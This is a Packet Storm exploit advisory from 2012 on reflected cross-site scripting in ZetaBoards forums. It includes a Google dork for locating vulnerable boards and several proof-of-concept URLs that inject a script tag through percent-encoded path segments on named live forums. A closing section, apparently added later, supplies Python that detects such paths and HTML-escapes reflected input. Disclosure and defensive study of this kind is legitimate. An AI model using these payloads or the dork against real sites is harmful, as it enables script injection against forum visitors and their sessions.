ZetaBoards Cross Site Scripting

2012-03-06T00:00:00
ID PACKETSTORM:110503
Type packetstorm
Reporter Sony
Modified 2012-03-06T00:00:00

Description

                                        
`# Exploit Title: ZetaBoards Cross Site Scripting  
# Date: 6.03.2012  
# Author: Sony  
# Software Link: http://www.zetaboards.com/  
# Google Dorks: intext:Hosted for free by ZetaBoards  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/03/zetaboards-cross-site-scripting.html  
..................................................................  
  
Well, we have multiple cross-site scripting vulnerabilities on ZetaBoards.  
  
Who uses ZetaBoards?  
  
http://www.zetaboards.com/directory/  
  
The ZetaBoards Forum Directory contains 55,882 boards. (c)  
  
Demo:  
  
http://if.invisionfree.com/index/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-hNc74z9U8Ak/T1ZYo20Qi5I/AAAAAAAAAsU/FvA7uSkQ1E4/s1600/forum2.JPG  
  
http://nintendo-forums.com/calendar/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-ny-FA_k5lIQ/T1ZY0NiZjOI/AAAAAAAAAsg/Wu1dk3V5QFg/s1600/forum1.JPG  
  
http://support.zetaboards.com/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/--2qVcuCeRy0/T1ZZAgL3hPI/AAAAAAAAAss/G6N1fFs29OI/s1600/forum3.JPG  
  
http://support.zetaboards.com/login/lostpw/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-SOIbojMMsyE/T1ZZOtjJCII/AAAAAAAAAs4/3D_Mpe3Pm-Q/s1600/forum4.JPG  
  
http://sonicblast.org/members/%22%22%3E%3Cscript%3Ealert%28%22We%20can%20see%20a%20ZetaBoard%20Cross%20Site%20Scripting%20by%20Sony%20inSecurity.Ro%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-zA3ibj72U9E/T1ZZbE7F5xI/AAAAAAAAAtE/w74HmHtYaU8/s1600/forum5.JPG  
  
Video:  
  
http://www.youtube.com/watch?v=ZGvwY9z3ZYA  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`
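
The demo URLs in the advisory carry a percent-encoded `"">` followed by a script tag inside the URL path. The Python below is an added example, not code from the advisory or from ZetaBoards: it flags such request paths in logs and HTML-escapes a path before it is reflected. The hosts, the function names and the assumption that the path is echoed into a double-quoted attribute are illustrative.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Characters that let a reflected path segment close an HTML attribute
# or open a new tag.
MARKUP = re.compile(r'[<>"\']')


def suspicious_path(url: str) -> bool:
    """Return True when the percent-decoded path carries HTML markup characters."""
    path = urlsplit(url).path
    # Decode a bounded number of times so double-encoded input is caught too.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return bool(MARKUP.search(path))


def render_link(path: str) -> str:
    """Reflect a request path into an href attribute with HTML escaping.

    Assumption: the page echoes the path inside a double-quoted attribute,
    which is what the leading quotes and '>' in the demo URLs suggest.
    """
    safe = html.escape(unquote(path), quote=True)
    return '<a href="{}">permalink</a>'.format(safe)


# Constructed sample requests (hosts are placeholders, not real boards).
SAMPLES = [
    "http://forum.example/members/",
    "http://forum.example/calendar/%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E",
    "http://forum.example/index/%2522%253E%253Cscript%253E",  # double-encoded
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(suspicious_path(url), url)
    print(render_link(urlsplit(SAMPLES[1]).path))
```

With escaping in place the quotes and angle brackets arrive in the page as `&quot;`, `&gt;` and `&lt;`, so the attribute is never closed and no script element is created.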